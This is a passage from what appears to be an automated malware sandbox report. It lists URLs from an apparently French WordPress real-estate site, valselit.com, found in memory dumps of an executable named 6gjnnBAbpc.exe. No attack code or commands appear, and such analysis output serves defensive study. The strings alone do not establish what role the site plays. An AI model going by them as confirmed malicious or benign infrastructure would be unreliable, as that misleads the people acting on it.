00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#webpage
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#website
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/172-appartement-a-vendre-lille-30534
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/174-appartement-a-vendre-grenoble-30514
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/177-appartement-a-vendre-sigean-30378
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/180-maison-a-vendre-milly-la-foret-41465
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/182-maison-a-vendre-royan-41301
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/184-appartement-a-vendre-valras-plage-41841
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/187-maison-a-vendre-bourg-saint-maurice-41586
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/189-appartement-a-vendre-ajaccio-41880
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/192-loffre-immobiliere-a-nogent-le-rotrou
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/195-coup-doeil-sur-le-marche-immobilier-a-chalon-sur-saone
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.541446010.0000000008E09000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.535847539.0000000008E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/8
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/?s=
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/achat-par-ville
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/astuces
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/comments/feed
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/doI
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/feed
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/immobilier
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/4
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/toY
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.5.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/bootstrap.css?ver=6.0.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/default.css?ver=6.0.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/fontawesome-all.css?ver=6.0.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/responsive.css?ver=6.0.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/bootstrap.js?ver=6.0.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/jquery.superfish.js?ver=6.0.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/theme.js?ver=6.0.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/style.css?ver=6.0.3
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2020/06/primo-accedant-226x300.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2020/06/primo-accedant.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527-1024x682.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527-300x200.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 